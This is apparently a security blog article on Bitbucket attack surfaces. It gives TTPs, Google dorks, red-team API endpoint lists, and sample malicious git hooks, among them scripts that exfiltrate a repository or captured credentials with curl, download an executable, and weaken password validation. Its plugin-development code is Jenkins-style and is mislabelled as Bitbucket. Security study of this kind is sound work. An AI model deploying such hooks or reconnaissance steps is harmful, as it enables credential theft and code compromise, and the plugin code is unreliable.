Bitbucket Attack Vector

Bitbucket Attack Vector

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Bitbucket, a widely used Git repository management solution, provides a platform for developers to manage and collaborate on code. However, its extensive functionality and integration capabilities also present numerous attack vectors and surfaces that adversaries might exploit. This APT report outlines potential attack vectors and surfaces within Bitbucket, focusing on the data pipeline, active directory (LDAP), application link, and add-ons.

Attack Vector 

1. Data Pipeline:

Attack Vector:

Data Interception: Adversaries may target the data pipeline to intercept, manipulate, or exfiltrate sensitive data.

Injection Attacks: Injecting malicious code or altering data during transit.

Attack Surface:

API Endpoints: Unauthorized access to API endpoints can lead to data leaks or unauthorized actions.

Data Transmission: Unsecured data transmission between integrated systems.


Implementing robust encryption for data in transit.

Ensuring API security through authentication and authorization mechanisms.

2. Active Directory – LDAP:

Attack Vector:

Credential Harvesting: Targeting LDAP to harvest user credentials and gain unauthorized access.

Privilege Escalation: Exploiting misconfigurations to escalate privileges.

Attack Surface:

LDAP Integration: Direct interaction with LDAP might expose it to unauthorized access or exploitation.

User Data: Sensitive user data stored or managed through LDAP.


Employing stringent access controls and monitoring for LDAP.

Regularly auditing and updating LDAP configurations.

3. Application Link:

Attack Vector:

Link Exploitation: Exploiting application links to gain unauthorized access or disrupt services.

Data Manipulation: Altering data being shared or transferred between linked applications.

Attack Surface:

Inter-Application Communication: The communication channel between linked applications.

Authentication Tokens: Tokens used for authenticating linked applications.


Ensuring secure and encrypted communication between linked applications.

Implementing token security and regularly rotating authentication tokens.

4. Add-Ons (JAR):

Attack Vector:

Malicious Add-On: Introducing a malicious add-on to compromise Bitbucket.

Add-On Vulnerabilities: Exploiting vulnerabilities within legitimate add-ons.

Attack Surface:

Add-On Marketplace: The platform through which add-ons are distributed and installed.

Add-On Permissions: The permissions and access granted to installed add-ons.


Validating and verifying add-ons before installation.

Limiting add-on permissions to the least privilege necessary.

Threat Actor Tactics, Techniques, and Procedures (TTPs):

Initial Access: Utilizing stolen credentials or exploiting vulnerabilities for initial access.

Execution: Deploying malicious add-ons or scripts for execution within the environment.

Persistence: Exploiting application links or add-ons to maintain persistent access.

Privilege Escalation: Exploiting misconfigurations or vulnerabilities within LDAP or add-ons.

Defense Evasion: Manipulating logs or employing obfuscation techniques.

Credential Access: Targeting LDAP or API tokens for credential access.

Discovery: Identifying valuable data or further exploit vectors within the data pipeline.

Lateral Movement: Utilizing application links or exploiting add-ons to move laterally.

Impact: Manipulating, deleting, or exfiltrating data to impact the organization.

Git Hook Vulnerabilities

Git hooks, a fundamental feature in Bitbucket, offer developers the flexibility to streamline workflows through automation. However, these hooks also harbor the potential for abuse by threat actors, presenting security risks on both the server-side and client-side of Bitbucket.

Server-Side Git Hook Abuses:

1. Malicious Code Execution: Server-side Git hooks, such as pre-receive and post-receive hooks, can be abused by attackers to execute unauthorized code on the Bitbucket server. The following is a non-functional example of a malicious pre-receive hook:


# A non-functional malicious pre-receive hook

while read oldrev newrev refname; do

  # Insert malicious code here


In reality, this script could run malicious code that compromises the server’s integrity or exfiltrates sensitive data.

2. Data Exfiltration: Malicious actors can manipulate server-side hooks to steal sensitive information from Bitbucket repositories. For instance, a modified post-receive hook might transmit confidential data to an external server:

# A non-functional example of a malicious post-receive hook for data exfiltration
while read oldrev newrev refname; do
git archive --format=zip --output=/tmp/ $newrev

  curl -X POST -F "file=@/tmp/"


This example demonstrates how attackers could exfiltrate data from a repository.

3. Data Tampering: Threat actors might manipulate server-side hooks to tamper with data within a repository. They can modify post-receive hooks to alter code or data after it has been pushed. Although this example is non-functional, it demonstrates how data tampering might occur:


# A non-functional malicious post-receive hook for data tampering

while read oldrev newrev refname; do

  if [ "$refname" == "refs/heads/master" ]; then

    # Insert code to modify repository data here



In a real-world scenario, this script could introduce vulnerabilities or compromise the integrity of a repository.

Client-Side Git Hook Abuses:

1. Credential Theft: Client-side Git hooks can be exploited to steal user credentials. Below is an example of a malicious pre-push hook:


# A non-functional example of a malicious client-side pre-push hook for credential theft

read -p "Enter your username: " username

read -sp "Enter your password: " password

# Send the captured credentials to a remote server (non-functional)

curl -X POST -d "username=$username&password=$password"

While this script may not work, it illustrates how an attacker might attempt to steal user credentials.

2. Code Injection: Threat actors can manipulate client-side hooks to inject malicious code into a repository without a developer’s knowledge. Here’s a simplified example of a malicious post-checkout hook:


# A non-functional example of a malicious client-side post-checkout hook for code injection

echo “Malicious code injection” >> compromised-file.js

This hypothetical script could insert unauthorized code into a developer’s workspace.

3. Propagation of Malware: Client-side hooks can also be abused to propagate malware within a development team. A malicious pre-clone hook, though non-functional, showcases how an attacker might attempt to distribute malware:


# A non-functional example of a malicious client-side pre-clone hook for malware propagation

echo "Downloading a useful tool..."

curl -o ~/Downloads/useful-tool.exe

This script, if operational, could attempt to download and execute malware on a developer’s machine during a repository clone operation.

4. Code Tampering: Attackers can manipulate client-side Git hooks to tamper with code and introduce vulnerabilities. For example, a malicious pre-commit hook could modify code in a way that introduces a security flaw, as demonstrated below:


# A non-functional example of a malicious client-side pre-commit hook for code tampering

sed -i 's/validate_password($password)/validate_password($password, false)/' login.php

In a real-world scenario, this modification could compromise the security of an application.

In summary, Git hooks in Bitbucket provide valuable automation capabilities but can also be potential vectors for abuse if not managed and secured properly.


Identifying Bitbucket Instances with Cyber Threat Intelligence Service

Google Dorks:

Find Bitbucket Instances:

Dork: intitle:”Bitbucket” login

Find Public Repositories:

Dork: intitle:”Bitbucket” “Overview” inurl:projects

Exposed .git Directories:

Dork: intitle:”index of” inurl:.git


User Enumeration:

Path: /rest/api/1.0/users

Repository Discovery:

Path: /rest/api/1.0/projects/{projectKey}/repos

SSH Keys:

Path: /rest/ssh/1.0/keys


Path: /rest/webhooks/1.0/webhook


Default HTTP:

Port: 7990

Default HTTPS:

Port: 7999


Port: 7992

Meta Tags:

Application Name:

Meta Tag: <meta name=”application-name” content=”Bitbucket”>

Important API Endpoints Across Red Teaming Stages

1. Reconnaissance Stage:

User Enumeration:

Endpoint: /rest/api/1.0/users

Red Team Use: Identifying users for targeted phishing or brute-force attacks.

Repository Discovery:

Endpoint: /rest/api/1.0/projects/{projectKey}/repos

Red Team Use: Identifying repositories to target for codebase analysis or data exfiltration.

2. Initial Access Stage:


Endpoint: /rest/auth/1/session

Red Team Use: Attempting unauthorized access via credential stuffing or brute force.

API Token Access:

Endpoint: /rest/access-tokens/1.0/tokens/current

Red Team Use: Attempting to steal or misuse API tokens.

3. Establishing Foothold Stage:

Create Pull Request:

Endpoint: /rest/api/1.0/projects/{projectKey}/repos/{repositorySlug}/pull-requests

Red Team Use: Introducing malicious code through pull requests.

Clone Repository:

Endpoint: /scm/{projectKey}/{repositorySlug}.git

Red Team Use: Downloading codebases to identify vulnerabilities or sensitive data.

4. Privilege Escalation Stage:

User Permissions:

Endpoint: /rest/api/1.0/admin/permissions/users?filter={username}

Red Team Use: Identifying users with high privileges to target.

Group Permissions:

Endpoint: /rest/api/1.0/admin/permissions/groups

Red Team Use: Identifying groups with high privileges for infiltration.

5. Lateral Movement Stage:

SSH Keys:

Endpoint: /rest/ssh/1.0/keys

Red Team Use: Stealing SSH keys to access other systems.

Application Links:

Endpoint: /rest/applinks/1.0/applicationlink

Red Team Use: Moving laterally to linked applications.

6. Impact Stage:

Delete Repository:

Endpoint: /rest/api/1.0/projects/{projectKey}/repos/{repositorySlug}

Red Team Use: Deleting or altering repositories to disrupt operations.

Modify User:

Endpoint: /rest/api/1.0/users/{userSlug}

Red Team Use: Modifying user details for further attacks or obfuscation.

Additional Endpoints:

7. Data Exfiltration Stage:

Fetch Commits:

Endpoint: /rest/api/1.0/projects/{projectKey}/repos/{repositorySlug}/commits

Red Team Use: Identifying and exfiltrating sensitive data or changes.

8. Persistence Stage:


Endpoint: /rest/webhooks/1.0/webhook

Red Team Use: Creating malicious webhooks for continuous data access.

9. Obfuscation Stage:

Audit Logs:

Endpoint: /rest/audit/1.0/audits

Red Team Use: Identifying and erasing traces of malicious activities.

10. Cleanup Stage:

Remove SSH Key:

Endpoint: /rest/ssh/1.0/keys/{keyId}

Red Team Use: Removing SSH keys to erase traces and maintain access.

Bitbucket Plugin Security and Development Guidelines

Bitbucket, a widely-used Git repository management solution, allows developers to extend its functionality through plugins. However, the development and use of plugins must be approached with a security-first mindset to prevent vulnerabilities and ensure the stability of the Bitbucket environment.

Bitbucket Plugin Security:

Dependency Scanning:

Ensure all dependencies of your plugin are free from known vulnerabilities.

Use tools like OWASP Dependency-Check to identify and fix issues.

Code Review:

Conduct regular code reviews to identify potential security issues.

Ensure that no secrets or sensitive data are hardcoded in the plugin code.

Access Control:

Implement strict access controls and ensure that only authorized users can configure or use the plugin.

Use Bitbucket’s built-in functions to enforce permissions.

public void doSomeAction(HttpServletRequest req, HttpServletResponse rsp) {


    // Action code here


Input Validation:

Validate and sanitize all inputs to prevent injection attacks.

Use allow-lists and regular expressions to validate data.

public FormValidation doCheckName(@QueryParameter String value) {

    if (value.matches("^[a-zA-Z0-9_]+$")) {

        return FormValidation.ok();

    } else {

        return FormValidation.error("Invalid name");



Output Encoding:

Ensure all outputs are properly encoded to prevent XSS attacks.

Use functions like HtmlUtils.htmlEscape to encode data.

String safeOutput = HtmlUtils.htmlEscape(inputString);

Bitbucket Plugin Development Guidelines:

Follow the MVC Architecture:

Separate the Model, View, and Controller to ensure clean and maintainable code.

Use Bitbucket API:

Leverage Bitbucket API for accessing built-in functionalities and objects.

Implement Descriptors:

Descriptors help in defining global configurations and settings.


public static final class DescriptorImpl extends Descriptor<Builder> {

    public boolean isApplicable(Class<? extends AbstractProject> aClass) {

        return true;


    public String getDisplayName() {

        return "My Plugin Name";



Define Configurations:

Use config.jelly to define the configuration options in the UI.

<j:jelly xmlns:j="jelly:core" xmlns:f="/lib/form">

    <f:entry title="Parameter" field="parameter">

        <f:textbox />



Handle Build Steps:

Implement classes to define actions to be taken during a build step.

public class MyBuilder extends Builder {

    private final String parameter;


    public MyBuilder(String parameter) {

        this.parameter = parameter;



    public boolean perform(AbstractBuild<?, ?> build, Launcher launcher, BuildListener listener) {

        // Build step actions here

        return true;



Manage Plugin Dependencies:

Ensure your pom.xml correctly defines all dependencies and Bitbucket version.










Bitbucket, while providing a robust platform for code management and collaboration, also presents various attack vectors and surfaces that need to be secured and monitored. Organizations must employ a defense-in-depth strategy, ensuring that each attack surface is secured, and potential vectors are mitigated. Regular audits, monitoring, and employing security best practices are pivotal in safeguarding the environment against sophisticated APTs.

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